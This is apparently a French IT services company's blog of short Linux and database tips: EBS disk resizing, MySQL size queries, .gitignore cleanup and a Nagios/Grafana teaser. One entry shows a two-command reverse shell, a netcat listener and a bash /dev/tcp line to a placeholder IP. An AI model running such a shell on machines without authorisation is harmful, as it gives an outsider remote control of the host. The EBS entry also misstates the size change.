Votre société de services en logiciels libres

Linux Mag n°248 – Comment interfacer Nagios et Grafana !

25 avril 2021   
Linux Mag n°248 – Comment interfacer Nagios et Grafana !

Cet article propose une solution simple, à base de scripts Python, pour faire afficher les alertes de Nagios dans un tableau de Grafana.

Retailler un disque EBS

5 janvier 2021   

Une fois la taille du disque EBS augmentée, la commande lsblk doit refléter cette augmentation. Ici le disque /dev/nvme0n1 est passé de 8 à 8 Gio:

$ lsblk
NAME          MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
nvme0n1       259:0    0   9G  0 disk
├─nvme0n1p1   259:1    0   8G  0 part /
└─nvme0n1p128 259:2    0   1M  0 part

Dans notre cas, il s’agit d’augmenter la taille d’une partition. Si ce n’est pas le cas et qu’il s’agit d’augmenter la taille d’un système de fichiers situé sur un disque, utilisez directement la commande de retaillage du type de système de fichiers (resize2fs ou xfs_growfs).

Attention, la commande suivante a besoin de créer des fichiers temporaires, il faut donc de l’espace sous /tmp. Pour cela, créez un système de fichiers de type tmpfs :

$ sudo mount -o size=10M,rw,nodev,nosuid -t tmpfs tmpfs /tmp

Pour augmenter la taille de la partition :

$ sudo growpart /dev/nvme0n1 1

Pour retailler le système de fichiers (ici, de type XFS) :

$ sudo xfs_growfs -d /

 

Créer un « reverse-shell » en 2 commandes

31 décembre 2020   

Sur votre machine locale qui est votre machine de contrôle, vous lancez un serveur TCP à l’écoute du port souhaité :

$ nc -lvp 4242

(on suppose que l’adresse IP de cette machine est 1.2.3.4)

Sur la machine distante, sur laquelle vous souhaitez exécuter un « reverse-shell », vous lancez la commande suivante :

# bash -c "sh - i >&/dev/tcp/1.2.3.4/4242 0>&1"

…et le tour est joué !

Obtenir la taille des bases MySQL/MariaDB

26 novembre 2020   
SELECT
	COUNT(*) AS Total_Table_Count
	,table_schema
	,CONCAT(ROUND(SUM(table_rows)/1000000,2),'M') AS Total_Row_Count
	,CONCAT(ROUND(SUM(data_length)/(1024*1024*1024),2),'G') AS Total_Table_Size
	,CONCAT(ROUND(SUM(index_length)/(1024*1024*1024),2),'G') AS Total_Table_Index
	,CONCAT(ROUND(SUM(data_length+index_length)/(1024*1024*1024),2),'G') Total_Size
FROM information_schema.TABLES
GROUP BY table_schema
ORDER BY SUM(data_length+index_length);

Mettre à jour un fichier .gitignore

4 février 2020   

Vous disposez d’un dépôt GIT qui contient déjà des fichiers ainsi qu’un fichier .gitignore. Vous modifiez maintenant votre fichier .gitignore pour « ignorer » de nouveaux fichiers mais qui ont déjà été enregistrés dans le dépôt : comment les faire « disparaître » ?

  1. « commitez » toutes vos modifications actuelles, y compris votre fichier .gitignore
  2. nettoyez votre cache local ainsi :
    git rm -r --cached .
    1. rm est le « remove »
    2. -r sera récursif
    3. --cached ne supprimera les fichiers que de l’index
    4. . indique que tous les fichiers seront marqués « untracked » (car pour « untracker » un fichier il faut faire un git rm --cached foo.txt)
  3. ajoutez à nouveau tous les fichiers à GIT :
    git add .
  4. enregistrez la modification de .gitignore :
    git commit -m ".gitignore fix"
  5. puis faites le « push »

(source : http://www.codeblocq.com/2016/01/Untrack-files-already-added-to-git-repository-based-on-gitignore/)